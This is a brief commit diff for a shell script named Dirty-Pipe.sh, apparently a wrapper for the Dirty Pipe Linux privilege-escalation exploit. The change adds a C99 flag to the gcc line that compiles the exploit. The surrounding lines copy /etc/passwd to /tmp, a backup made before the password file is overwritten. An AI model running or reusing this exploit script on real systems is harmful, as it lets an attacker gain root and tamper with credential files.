Update Dirty-Pipe.sh

This commit is contained in:
imfiver
2022-03-08 03:20:35 +08:00
committed by GitHub
parent ab55a9263d
commit 29fbcf70c7

View File

@@ -158,7 +158,7 @@ int main(int argc, char **argv)
}
EOF
gcc exp.c -o exp
gcc exp.c -o exp -std=c99
# 备份密码文件
cp /etc/passwd /tmp/passwd